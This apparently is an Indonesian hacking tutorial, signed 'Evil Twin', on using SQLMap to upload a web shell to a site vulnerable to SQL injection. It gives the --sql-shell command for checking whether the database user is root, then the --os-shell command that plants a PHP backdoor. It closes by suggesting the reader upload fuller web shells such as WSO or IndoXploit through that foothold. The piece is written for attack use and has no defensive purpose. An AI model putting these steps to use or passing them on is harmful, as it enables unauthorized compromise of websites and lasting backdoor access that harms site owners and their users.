Upload Shell Menggunakan SQLMap

Evil Twin

Hallo, 
Oke pada artikel kali ini Saya ingin memberikan Cara mengupload shell menggunakan SQLMap, Tentu Kalian sudah tau apa itu SQLMap. Tools yang satu ini memiliki banyak fitur dan sangat mudah untuk digunakan.

Oke langsung aja ke tutorialnya.

Pastikan Usernya Root

Syarat pertama adalah user nya harus root, Kalian bisa cek usernya menggunakan command seperti ini di SQLMap.
./sqlmap.py --url "http://localhost.com/param.php?id=1337" --sql-shell
Lalu masukkan query SQL untuk mengecek user yaitu user(), Kalian juga bisa memasukkan query yang lainnya seperti database() dan lain-lain.


Bisa dilihat gambar diatas, usernya adalah root@localhost. Kemungkinan besar bisa upload shell langsung menggunakan SQLMap.

Upload Dan Akses Shell

Jika sudah mengetahui bahwa usernya adalah root, Maka tahap selanjutnya adalah meng-upload shell menggunakan command seperti ini.
./sqlmap.py --url "http://localhost.com/param.php?id=1337" --os-shell
Nantinya SQLMap akan mendeteksi otomatis Shell backdoor apa yang cocok untuk web target Kalian (Kebetulan disini PHP).


Jika output nya seperti gambar diatas "[INFO] The backdoor has been successfully uploaded on PATH". Maka bisa dipastikan Shell berhasil ter-upload. Tinggal salin dan paste kan aja di browser.


Yapss, ada uploader disitu. Tinggal upload aja deh Shell andalan Kalian yang fiturnya lebih lengkap seperti IndoXploit, WSO, Evil Twin Shell dan lain-lain.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Upload Shell Menggunakan SQLMap".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi karena Saya juga masih tahap belajar.

Semoga bermanfaat dan sampai jumpa di artikel selanjutnya!
Evil Twin